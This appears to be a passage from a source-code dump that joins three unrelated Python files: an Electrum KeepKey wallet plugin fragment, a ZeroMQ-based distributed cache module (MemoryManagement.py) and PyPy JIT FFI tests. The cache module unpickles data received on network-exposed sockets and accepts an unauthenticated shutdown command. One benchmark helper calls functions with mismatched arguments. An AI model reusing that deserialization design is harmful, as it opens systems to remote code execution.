m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
MemoryManagement.py
|
import Queue
from multiprocessing import Process
from cPickle import loads, dumps
from threading import Thread
import zmq
from time import time, sleep
from CellCycle.MemoryModule.Cache import CacheSlubLRU
from CellCycle.ChainModule.ListThread import ListThread
from CellCycle.ChainModule.ListCommunication import InternalChannel
SETCOMMAND = 0
GETCOMMAND = 1
SHUTDOWNCOMMAND = -1
TRANSFERMEMORY = 2
NEWMASTER = 3
TRANSFERCOMPLETE = 4
NEWSLAVE = 5
NEWSTART = 6
def startMemoryTask(settings, logger, master):
url_getBackend = "inproc://get_memory" + ("master" if master else "slave")
url_setBackend = "inproc://set_memory" + ("master" if master else "slave")
url_setFrontend = "tcp://*:" + str(settings.getMasterSetPort() if master else settings.getSlaveSetPort())
url_getFrontend = "tcp://*:" + str(settings.getMasterGetPort() if master else settings.getSlaveGetPort())
#create new process
processName = "python-CCMemoryMaster" if master else "python-CCMemorySlave"
p = Process(name=processName,target=_memoryTask, args=(settings, logger,master, url_setFrontend, url_getFrontend, url_getBackend, url_setBackend))
p.start()
return url_getBackend, url_setBackend, url_setFrontend, url_getFrontend
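"""
usage (illustrative sketch; "settings" and "logger" stand for the CellCycle
settings and logger objects used elsewhere in this module):
    from MemoryModule.MemoryManagement import startMemoryTask
    urls = startMemoryTask(settings, logger, master=True)
    url_getBackend, url_setBackend, url_setFrontend, url_getFrontend = urls
"""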
def _memoryTask(settings, logger,master, url_setFrontend, url_getFrontend, url_getBackend, url_setBackend):
from Cache import Slab, CacheSlubLRU
# grab settings
slabSize = settings.getSlabSize()
preallocatedPool = settings.getPreallocatedPool()
getterNumber = settings.getGetterThreadNumber()
# initialize cache
cache = CacheSlubLRU(preallocatedPool , slabSize, logger) #set as 10 mega, 1 mega per slab
#log
logger.debug("Memory Process initialized:" + str(preallocatedPool) + "B, get# = " + str(getterNumber))
# Prepare our context and sockets
context = zmq.Context.instance()
# Socket to talk to get
socketGetFrontend = context.socket(zmq.ROUTER)
socketGetFrontend.bind(url_getFrontend)
# Socket to talk to workers
socketGetBackend = context.socket(zmq.DEALER)
socketGetBackend.bind(url_getBackend)
timing = {}
timing["getters"] = []
timing["setters"] = [-1]
Thread(name='MemoryGetProxy',target=_proxyThread, args=(logger, master, socketGetFrontend, socketGetBackend, url_getFrontend, url_getBackend)).start()
for i in range(getterNumber):
timing["getters"].append(-1)
th = Thread(name='MemoryGetter',target=_getThread, args=(i,logger, settings, cache,master,url_getBackend, timing))
th.start()
slaveSetQueue = Queue.Queue()
hostState = {}
hostState["current"] = None
Thread(name='MemoryPerformanceMetricator',target=_memoryMetricatorThread, args=(logger, cache, settings, master, timing)).start()
Thread(name='MemorySlaveSetter',target=_setToSlaveThread, args=(logger,settings, cache,master,url_getBackend, slaveSetQueue, hostState)).start()
_setThread(logger, settings, cache,master,url_setFrontend,slaveSetQueue, hostState, timing)
def _memoryMetricatorThread(logger, cache, settings, master, timing):
if master:
period = settings.getScalePeriod()
setScaleDownLevel = settings.getSetScaleDownLevel() if settings.getSetScaleDownLevel() >0 else -float("inf")
setScaleUpLevel = settings.getSetScaleUpLevel() if settings.getSetScaleUpLevel() >0 else float("inf")
getScaleDownLevel = settings.getGetScaleDownLevel() if settings.getGetScaleDownLevel() >0 else -float("inf")
getScaleUpLevel = settings.getGetScaleUpLevel() if settings.getGetScaleUpLevel() >0 else float("inf")
logger.debug("Metricator alive, period: "+ str(period) +"s, getThrLevel: [" +str(getScaleDownLevel) +"," + str(getScaleUpLevel)+ "], setThrLevel: [" + str(setScaleDownLevel) + "," + str(setScaleUpLevel) + "]" )
# this channel is necessary to send scale up/down requests
internal_channel = InternalChannel(addr='127.0.0.1', port=settings.getIntPort(), logger=logger)
internal_channel.generate_internal_channel_client_side()
from random import gauss
sleep(60)
while True:
sleep(abs(gauss(period, period/10)))
locked = timing["setters"][0].isTransferring()
setMean = 1.0 - timing["setters"][0].calcMean()
getMean = 0.0
for metr in timing["getters"]:
getMean += 1.0 - metr.calcMean()
getMean = getMean / settings.getGetterThreadNumber()
logger.debug("Working time for setters: " + str(setMean) + ", getters (mean): " + str(getMean) )
# scale up needed
if (getMean >= getScaleUpLevel or setMean >= setScaleUpLevel) and not locked:
logger.debug("Requests for scale Up!")
# call scale up service
ListThread.notify_scale_up(internal_channel)
# self.list_communication_thread.notify_scale_up()
# scale down needed
elif getMean <= getScaleDownLevel and setMean <= setScaleDownLevel and not locked:
logger.debug("Requests for scale Down!")
# call scale down service
ListThread.notify_scale_down(internal_channel)
# self.list_communication_thread.notify_scale_down()
def _proxyThread(logger, master, frontend, backend, url_frontend, url_backend):
logger.debug("Routing from " + url_frontend + " to " + url_backend)
zmq.proxy(frontend, backend)
def _setToSlaveThread(logger,settings, cache, master,url, queue, hostState):
if(not master):
return
socket = zmq.Context.instance().socket(zmq.PUSH)
import time
while hostState["current"] is None:
logger.debug("cannot send to slave, net info: "+ str(hostState["current"]))
time.sleep(1)
slaveAddress = "tcp://"+hostState["current"].slave.ip + ":"+ str(settings.getSlaveSetPort())
socket.connect(slaveAddress)
oldAddress = "tcp://"+hostState["current"].slave.ip + ":"+ str(settings.getSlaveSetPort())
logger.debug("Finally I'm configured")
while True:
objToSend = queue.get()
if(slaveAddress != None):
sended = False
while( not sended):
try:
slaveAddress = "tcp://"+hostState["current"].slave.ip + ":"+ str(settings.getSlaveSetPort())
if(slaveAddress != oldAddress):
oldAddress = slaveAddress
socket = zmq.Context.instance().socket(zmq.PUSH)
socket.connect(slaveAddress)
logger.debug("Change of slave:" + slaveAddress)
socket.send(dumps(Command(SETCOMMAND, objToSend.key, objToSend.value)))
if(settings.isVerbose()):
logger.debug("sended current key to slave: "+str(objToSend.key) +" to " + str(slaveAddress))
sended = True
except Exception as e:
logger.warning("error in slave: " + str(e))
def _setThread(logger, settings, cache, master, url,queue, hostState, timing):
logger.debug("Listening in new task for set on " + url)
context = zmq.Context.instance()
socket = context.socket(zmq.PULL)
socket.set_hwm(1)
socket.bind(url)
internal_channel_added = InternalChannel(addr="127.0.0.1", port=settings.getMemoryObjectPort(), logger=logger)
internal_channel_added.generate_internal_channel_client_side()
internal_channel_restored = InternalChannel(addr="127.0.0.1", port=settings.getIntPort(), logger=logger)
internal_channel_restored.generate_internal_channel_client_side()
transferToDoAfter = False
if master:
timing["setters"] = []
timing["setters"].append(TimingMetricator())
while True:
try:
if master:
timing["setters"][0].startWaiting()
recv = socket.recv()
command = loads(recv)
if(settings.isVerbose()):
logger.debug("received set command: " + str(command))
#logger.debug("received set command: " + str(command))
if command.type == SETCOMMAND:
if(master):
timing["setters"][0].startWorking()
queue.put(Command(command.type, command.key, command.value))
cache.set(command.key, command.value)
if(master):
timing["setters"][0].stopWorking()
elif command.type == SHUTDOWNCOMMAND:
logger.debug("shutdown command")
import os, signal
os.kill(os.getpid(), signal.SIGTERM)
return
elif command.type == TRANSFERMEMORY:
if(master):
timing["setters"][0].setTransferring()
for address in command.address:
logger.debug("Transferring memory to " + str(address) + "....")
dest = address
dataList = cache.cache.iteritems()
begin = command.optional[0]
end = command.optional[1]
_transfer(settings,logger, dest, dataList, begin, end)
logger.debug("Transfer complete!")
elif command.type == NEWMASTER:
if(hostState["current"] == None):
hostState["current"] = command.optional
logger.debug("Configuration of net data: "+ str(hostState["current"]))
else:
hostState["current"] = command.optional
logger.warning("master is dead. Recovering... "+ str(hostState["current"]))
# import keys of master, from this slave memory
thisMasterMemory = "tcp://"+hostState["current"].myself.ip+":"+ str(settings.getMasterSetPort())
thisSlaveMemory = "tcp://"+hostState["current"].myself.ip+":"+ str(settings.getSlaveSetPort())
newSlaveSlaveMemory = "tcp://"+hostState["current"].slave.ip+":"+ str(settings.getSlaveSetPort())
beginFirst = hostState["current"].myself.min_key #command.optional.thisnode.slave.keys.begin oldone!
endFirst = hostState["current"].myself.max_key #command.optional.thisnode.slave.keys.end oldone!
transferRequest(thisSlaveMemory, [thisMasterMemory, newSlaveSlaveMemory], beginFirst, endFirst)
# create new slave memory for this node from new master
newMasterMasterMemory = "tcp://"+ hostState["current"].master.ip +":"+ str(settings.getMasterSetPort())
thisSlaveMemory = "tcp://"+hostState["current"].myself.ip+":"+ str(settings.getSlaveSetPort())
beginSecond = hostState["current"].master.min_key #command.optional.newmaster.master.keys.begin
endSecond = hostState["current"].master.max_key #command.optional.newmaster.master.keys.end
transferRequest(newMasterMasterMemory,[thisSlaveMemory], beginSecond, endSecond)
transferToDoAfter = True
transferType = NEWMASTER
elif command.type == NEWSLAVE:
hostState["current"] = command.optional
logger.debug("Slave is dead, new info: " + str(hostState["current"]))
elif command.type == NEWSTART:
hostState["current"] = command.optional
logger.debug("This is the ip of the vm: \nmaster_of_master {}\n"
"master {}\n"
"myself {}\n"
"slave {}\n"
"slave_of_slave{}".format(hostState["current"].master_of_master.ip,
hostState["current"].master.ip,
hostState["current"].myself.ip,
hostState["current"].slave.ip,
hostState["current"].slave_of_slave.ip))
logger.debug("Memory needs to be configured, first bootup of this memory node, new info: "+ str(hostState["current"].print_elements()))
# import keys of master
thisMasterMemory = "tcp://" + hostState["current"].myself.ip +":"+ str(settings.getMasterSetPort())
thisSlaveMemory = "tcp://" + hostState["current"].myself.ip +":"+ str(settings.getSlaveSetPort())
masterMasterMemory = "tcp://"+hostState["current"].master.ip+":"+ str(settings.getMasterSetPort())
beginFirst = hostState["current"].myself.min_key #command.optional.thisnode.slave.keys.begin oldone!
endFirst = hostState["current"].myself.max_key #command.optional.thisnode.slave.keys.end oldone!
beginSlave = hostState["current"].master.min_key #command.optional.thisnode.slave.keys.begin oldone!
endSlave = hostState["current"].master.max_key #command.optional.thisnode.slave.keys.end oldone!
transferRequest(masterMasterMemory, [thisMasterMemory], beginFirst, endFirst)
transferRequest(masterMasterMemory, [thisSlaveMemory], beginSlave, endSlave)
logger.debug("Waiting for transferring")
transferToDoAfter = True
transferType = NEWSTART
elif command.type == TRANSFERCOMPLETE:
logger.debug("Transfer Complete message received. ToDoAfter: "+str(transferToDoAfter))
if transferToDoAfter and master:
logger.debug("I'm communicating that transfer is completed")
# call the list communication for added or recovered
if transferType == NEWSTART:
internal_channel_added.send_first_internal_channel_message(message=b"FINISHED")
internal_channel_added.wait_int_message(dont_wait=False)
logger.debug("MEMORY TRANSFER finished, notify list thread")
elif transferType == NEWMASTER:
logger.debug("MEMORY TRANSFER finished for new master, notify list thread")
ListThread.notify_memory_request_finished(internal_channel_restored)
# TODO: notify the cycle manager that recovery has finished
logger.warning("new master state recovery: DONE")
#do something with command and hostState
#command.optional --> hostState
logger.debug("Waiting state off")
transferToDoAfter = False
except Exception as e:
logger.error(e)
def _transfer(settings,logger, dest, dataList, begin, end):
logger.debug("Transfer memory command received: Transferring memory to "+ str(dest)+", b,e: "+str(begin)+","+str(end))
context = zmq.Context.instance()
socketTM = context.socket(zmq.PUSH)
socketTM.set_hwm(1)
socketTM.connect(dest)
if(int(begin) <= int(end)):
range1 = (int(begin), int(end))
range2 = (0, 0)
else:
# the key interval wraps around, e.g. (11, 7) becomes 11->inf and -inf->7
range1 = (int(begin), float("inf"))
range2 = (-float("inf"), int(end))
def inRange(x,rangey):
x = int(x)
if(x>=rangey[0] and x<=rangey[1]):
return True
else:
return False
try:
for data in dataList:
key = int(data[0])
if(inRange(key, range1) or inRange(key, range2)):
value = data[1].getValue(key)
if(settings.isVerbose()):
logger.debug("transferred: key "+str(key)+",value " + str(value))
socketTM.send(dumps(Command(SETCOMMAND,key,value)))
else:
if(settings.isVerbose()):
key = int(data[0])
value = data[1].getValue(key)
logger.debug("not transferred: key "+str(key)+",value " + str(value))
except Exception:
pass
finally:
socketTM.send(dumps(Command(TRANSFERCOMPLETE)))
logger.debug("Transfer memory command completed: Transferred memory to "+ str(dest))
socketTM.close()
def _getThread(index, logger,settings, cache, master, url, timing):
logger.debug("Listening in new task for get on " + url)
context = zmq.Context.instance()
socket = context.socket(zmq.REP)
socket.connect(url)
if master:
timing["getters"][index] = TimingMetricator()
while True:
try:
if master:
timing["getters"][index].startWaiting()
command = loads(socket.recv())
if master:
timing["getters"][index].startWorking()
if(settings.isVerbose()):
logger.debug("received get command: " + str(command))
#logger.debug( "received get command: " + str(command))
if command.type == GETCOMMAND:
v=cache.get(command.key)
socket.send(dumps(v))
#if command.type == SHUTDOWNCOMMAND:
# return
if master:
timing["getters"][index].stopWorking()
except Exception as e:
logger.error(e)
# client operations
def getRequest(url, key):
context = zmq.Context.instance()
socket = context.socket(zmq.REQ)
socket.connect(url)
socket.send(dumps(Command(GETCOMMAND, key)))
v = loads(socket.recv())
socket.close()
return v
def setRequest(url, key, value):
context = zmq.Context.instance()
socket = context.socket(zmq.PUSH)
socket.set_hwm(1)
socket.connect(url)
socket.send(dumps(Command(SETCOMMAND, key, value)))
socket.close()
def killProcess(url):
context = zmq.Context.instance()
socket = context.socket(zmq.PUSH)
socket.connect(url)
socket.send(dumps(Command(SHUTDOWNCOMMAND)))
socket.close()
def transferRequest(url, dest, begin, end):
context = zmq.Context.instance()
socket = context.socket(zmq.PUSH)
socket.connect(url)
socket.send(dumps(Command(TRANSFERMEMORY, address=dest, optional=(begin,end))))
socket.close()
"""
usage:
from MemoryModule.MemoryManagement import newMasterRequest
import zmq
newMasterRequest("tcp://localhost:" + str(settings.getMasterSetPort()), hostInformations)
"""
def newMasterRequest(url, hostInformations):
context = zmq.Context.instance()
socket = context.socket(zmq.PUSH)
socket.connect(url)
command = Command(NEWMASTER)
command.optional = hostInformations
socket.send(dumps(command))
socket.close()
"""
usage:
from MemoryModule.MemoryManagement import newSlaveRequest
import zmq
newSlaveRequest("tcp://localhost:" + str(settings.getMasterSetPort()), hostInformations)
"""
def newSlaveRequest(url, hostInformations):
context = zmq.Context.instance()
socket = context.socket(zmq.PUSH)
socket.connect(url)
command = Command(NEWSLAVE)
command.optional = hostInformations
socket.send(dumps(command))
socket.close()
"""
usage:
from MemoryModule.MemoryManagement import newStartRequest
import zmq
newStartRequest("tcp://localhost:" + str(settings.getMasterSetPort()), hostInformations)
"""
def newStartRequest(url, hostInformations):
context = zmq.Context.instance()
socket = context.socket(zmq.PUSH)
socket.connect(url)
command = Command(NEWSTART)
command.optional = hostInformations
socket.send(dumps(command))
socket.close()
def standardnewMasterRequest(settings, hostInformations, host="localhost"):
url_setPort = "tcp://"+host+":" + str(settings.getMasterSetPort())
return newMasterRequest(url_setPort, hostInformations)
def standardMasterSetRequest(settings, key, value, host="localhost"):
url_setPort = "tcp://"+host+":" + str(settings.getMasterSetPort())
return setRequest(url_setPort, key, value)
def standardMasterGetRequest(settings, key, host="localhost"):
url_getPort = "tcp://"+host+":" + str(settings.getMasterGetPort())
return getRequest(url_getPort, key)
def standardSlaveSetRequest(settings, key, value, host="localhost"):
url_setPort = "tcp://"+host+":" + str(settings.getSlaveSetPort())
return setRequest(url_setPort, key, value)
def standardSlaveGetRequest(settings, key, host="localhost"):
url_getPort = "tcp://"+host+":" + str(settings.getSlaveGetPort())
return getRequest(url_getPort, key)
def standardKillRequest(settings, host="localhost"):
url_setPort = "tcp://"+host+":" + str(settings.getMasterSetPort())
return killProcess(url_setPort)
def standardTransferRequest(settings, dest="localhost", host="localhost"):
url_setPort = "tcp://"+host+":" + str(settings.getMasterSetPort())
dest = "tcp://"+dest+":" + str(settings.getSlaveSetPort())
return transferRequest(url_setPort, [dest], 0,99999999999999)
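# A hedged usage sketch of the client helpers above, assuming a node is already
# listening on the configured ports and `settings` has been loaded:
#     standardMasterSetRequest(settings, 42, "hello")   # push a key/value to the master
#     value = standardMasterGetRequest(settings, 42)    # read it back
#     standardKillRequest(settings)                     # ask the node to shut down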
class Command(object):
def __init__(self, type, key=None, value=None, address=[], optional=None):
self.type = int(type)
self.key = key
self.value = value
self.address = address
self.optional = optional
def __str__(self):
return "type: "+ str(self.type) + ", key: "+ str(self.key) + ", value: " + str(self.value)
# only for benchmark
def startMemoryTaskForTrial(preallocatedPool, slabSize, logger, pipe_set, pipe_get):
cache = CacheSlubLRU(preallocatedPool , slabSize, logger) #set as 10 mega, 1 mega per slab
for pipe in pipe_get:
th = Thread(target=_getThread, args=(cache, pipe))
th.start()
_setThread(cache, pipe_set)
class TimingMetricator(object):
"""docstring forTimingMetricator."""
def __init__(self):
self.startWaitingTime = 0
self.startWorkingTime = 0
self.stopWorkingTime = 0
self.meanWaitingRatio = 0
self.totalWorkingTime = 0
self.startPeriod = time()
self.transferring = False
def __str__(self):
return str(self.getMean())
def getMean(self):
return self.meanWaitingRatio
def startWorking(self):
self.startWorkingTime = time()
def startWaiting(self):
self.startWaitingTime = time()
def setTransferring(self):
self.transferring = True
def isTransferring(self):
return self.transferring
def calcMean(self):
period = time() - self.startPeriod
working = self.totalWorkingTime
waitingMean = 1 - (working / float(period))
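# e.g. 0.25 s of work over a 1.0 s period gives a waiting ratio of 0.75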
self.totalWorkingTime = 0
self.startPeriod = time()
self.meanWaitingRatio = waitingMean
self.transferring = False
return waitingMean
def stopWorking(self):
self.stopWorkingTime = time()
work = self.stopWorkingTime - self.startWorkingTime
self.totalWorkingTime += work
|
test_ffi.py
|
import sys, py
from pypy.module.pypyjit.test_pypy_c.test_00_model import BaseTestPyPyC
class Test__ffi(BaseTestPyPyC):
def test__ffi_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
from _rawffi.alt import CDLL, types
except ImportError:
sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
return 0
libm = CDLL(libm_name)
pow = libm.getfunc('pow', [types.double, types.double],
types.double)
i = 0
res = 0
while i < 300:
tmp = pow(2, 3) # ID: fficall
res += tmp
i += 1
return pow.getaddr(), res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
pow_addr, res = log.result
assert res == 8.0 * 300
py.test.skip("XXX re-optimize _ffi for the JIT?")
loop, = log.loops_by_filename(self.filepath)
if 'ConstClass(pow)' in repr(loop): # e.g. OS/X
pow_addr = 'ConstClass(pow)'
assert loop.match_by_id('fficall', """
guard_not_invalidated(descr=...)
i17 = force_token()
setfield_gc(p0, i17, descr=<.* .*PyFrame.vable_token .*>)
f21 = call_release_gil(%s, 2.000000, 3.000000, descr=<Callf 8 ff EF=7>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
""" % pow_addr)
def test__ffi_call_frame_does_not_escape(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
from _rawffi.alt import CDLL, types
except ImportError:
sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
return 0
libm = CDLL(libm_name)
pow = libm.getfunc('pow', [types.double, types.double],
types.double)
def mypow(a, b):
return pow(a, b)
i = 0
res = 0
while i < 300:
tmp = mypow(2, 3)
res += tmp
i += 1
return pow.getaddr(), res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
pow_addr, res = log.result
assert res == 8.0 * 300
loop, = log.loops_by_filename(self.filepath)
opnames = log.opnames(loop.allops())
# we only force the virtualref, not its content
assert opnames.count('new_with_vtable') == 1
def test__ffi_call_releases_gil(self):
from rpython.rlib.clibffi import get_libc_name
def main(libc_name, n):
import time
import os
from threading import Thread
#
if os.name == 'nt':
from _rawffi.alt import WinDLL, types
libc = WinDLL('Kernel32.dll')
sleep = libc.getfunc('Sleep', [types.uint], types.uint)
delays = [0]*n + [1000]
else:
from _rawffi.alt import CDLL, types
libc = CDLL(libc_name)
sleep = libc.getfunc('sleep', [types.uint], types.uint)
delays = [0]*n + [1]
#
def loop_of_sleeps(i, delays):
for delay in delays:
sleep(delay) # ID: sleep
#
threads = [Thread(target=loop_of_sleeps, args=[i, delays]) for i in range(5)]
start = time.time()
for i, thread in enumerate(threads):
thread.start()
for thread in threads:
thread.join()
end = time.time()
return end - start
log = self.run(main, [get_libc_name(), 200], threshold=150,
import_site=True)
assert 1 <= log.result <= 1.5 # at most 0.5 seconds of overhead
loops = log.loops_by_id('sleep')
assert len(loops) == 1 # make sure that we actually JITted the loop
def test__ffi_struct(self):
def main():
from _rawffi.alt import _StructDescr, Field, types
fields = [
Field('x', types.slong),
]
descr = _StructDescr('foo', fields)
struct = descr.allocate()
i = 0
while i < 300:
x = struct.getfield('x') # ID: getfield
x = x+1
struct.setfield('x', x) # ID: setfield
i += 1
return struct.getfield('x')
#
log = self.run(main, [])
py.test.skip("XXX re-optimize _ffi for the JIT?")
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('getfield', """
guard_not_invalidated(descr=...)
i57 = getfield_raw_i(i46, descr=<FieldS dynamic 0>)
""")
assert loop.match_by_id('setfield', """
setfield_raw(i44, i57, descr=<FieldS dynamic 0>)
""")
def test__cffi_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libm = _cffi_backend.load_library(libm_name)
BDouble = _cffi_backend.new_primitive_type("double")
BInt = _cffi_backend.new_primitive_type("int")
BPow = _cffi_backend.new_function_type([BDouble, BInt], BDouble)
ldexp = libm.load_function(BPow, 'ldexp')
i = 0
res = 0
while i < 300:
tmp = ldexp(1, 3) # ID: cfficall
res += tmp
i += 1
BLong = _cffi_backend.new_primitive_type("long")
ldexp_addr = int(_cffi_backend.cast(BLong, ldexp))
return ldexp_addr, res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
ldexp_addr, res = log.result
assert res == 8.0 * 300
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
f97 = call_release_gil_f(91, i59, 1.0, 3, descr=<Callf 8 fi EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
""", ignore_ops=['guard_not_invalidated'])
def test__cffi_call_c_int(self):
if sys.platform == 'win32':
py.test.skip("not tested on Windows (this test must pass on "
"other platforms, and it should work the same way)")
def main():
import os
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libc = _cffi_backend.load_library(None)
BInt = _cffi_backend.new_primitive_type("int")
BClose = _cffi_backend.new_function_type([BInt], BInt)
_dup = libc.load_function(BClose, 'dup')
i = 0
fd0, fd1 = os.pipe()
while i < 300:
tmp = _dup(fd0) # ID: cfficall
os.close(tmp)
i += 1
os.close(fd0)
os.close(fd1)
BLong = _cffi_backend.new_primitive_type("long")
return 42
#
log = self.run(main, [])
assert log.result == 42
loop, = log.loops_by_filename(self.filepath)
if sys.maxint > 2**32:
extra = "i98 = int_signext(i97, 4)"
else:
extra = ""
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
i97 = call_release_gil_i(91, i59, i50, descr=<Calli 4 i EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
%s
""" % extra, ignore_ops=['guard_not_invalidated'])
def test__cffi_call_size_t(self):
if sys.platform == 'win32':
py.test.skip("not tested on Windows (this test must pass on "
"other platforms, and it should work the same way)")
def main():
import os
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libc = _cffi_backend.load_library(None)
BInt = _cffi_backend.new_primitive_type("int")
BSizeT = _cffi_backend.new_primitive_type("size_t")
BChar = _cffi_backend.new_primitive_type("char")
BCharP = _cffi_backend.new_pointer_type(BChar)
BWrite = _cffi_backend.new_function_type([BInt, BCharP, BSizeT],
BSizeT) # not signed here!
_write = libc.load_function(BWrite, 'write')
i = 0
fd0, fd1 = os.pipe()
buffer = _cffi_backend.newp(BCharP, b'A')
while i < 300:
tmp = _write(fd1, buffer, 1) # ID: cfficall
assert tmp == 1
assert os.read(fd0, 2) == b'A'
i += 1
os.close(fd0)
os.close(fd1)
return 42
#
log = self.run(main, [])
assert log.result == 42
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
i97 = call_release_gil_i(91, i59, i10, i12, 1, descr=<Calli . iii EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
p98 = call_r(ConstClass(fromrarith_int__r_uint), i97, descr=<Callr . i EF=4>)
guard_no_exception(descr=...)
""", ignore_ops=['guard_not_invalidated'])
def test_cffi_call_guard_not_forced_fails(self):
# this is the test_pypy_c equivalent of
# rpython/jit/metainterp/test/test_fficall::test_guard_not_forced_fails
#
# it requires cffi to be installed for pypy in order to run
def main():
import sys
try:
import cffi
except ImportError:
sys.stderr.write('SKIP: cannot import cffi\n')
return 0
ffi = cffi.FFI()
ffi.cdef("""
typedef void (*functype)(int);
int foo(int n, functype func);
""")
lib = ffi.verify("""
#include <signal.h>
typedef void (*functype)(int);
int foo(int n, functype func) {
if (n >= 2000) {
func(n);
}
return n*2;
}
""")
@ffi.callback("functype")
def mycallback(n):
if n < 5000:
return
# make sure that guard_not_forced fails
d = {}
f = sys._getframe()
while f:
d.update(f.f_locals)
f = f.f_back
n = 0
while n < 10000:
res = lib.foo(n, mycallback) # ID: cfficall
# this is the real point of the test: before the
# refactor-call_release_gil branch, the assert failed when
# res == 5000
assert res == n*2
n += 1
return n
log = self.run(main, [], import_site=True,
discard_stdout_before_last_line=True) # <- for Win32
assert log.result == 10000
loop, = log.loops_by_id('cfficall')
assert loop.match_by_id('cfficall', """
...
i1 = call_release_gil_i(..., descr=<Calli 4 ii EF=7 OS=62>)
...
""")
def test__cffi_bug1(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libm = _cffi_backend.load_library(libm_name)
BDouble = _cffi_backend.new_primitive_type("double")
BSin = _cffi_backend.new_function_type([BDouble], BDouble)
sin = libm.load_function(BSin, 'sin')
def f(*args):
for i in range(300):
sin(*args)
f(1.0)
f(1)
#
libm_name = get_libm_name(sys.platform)
self.run(main, [libm_name])
# assert did not crash
def test_cffi_init_struct_with_list(self):
def main(n):
import sys
try:
import cffi
except ImportError:
sys.stderr.write('SKIP: cannot import cffi\n')
return 0
ffi = cffi.FFI()
ffi.cdef("""
struct s {
short x;
short y;
short z;
};
""")
for i in range(n):
ffi.new("struct s *", [i, i, i])
log = self.run(main, [300])
loop, = log.loops_by_filename(self.filepath)
assert loop.match("""
i106 = getfield_gc_i(p20, descr=...)
i161 = int_lt(i106, i43)
guard_true(i161, descr=...)
i162 = int_add(i106, 1)
p110 = getfield_gc_r(p16, descr=...)
setfield_gc(p20, i162, descr=...)
guard_value(p110, ConstPtr(ptr111), descr=...)
guard_not_invalidated(descr=...)
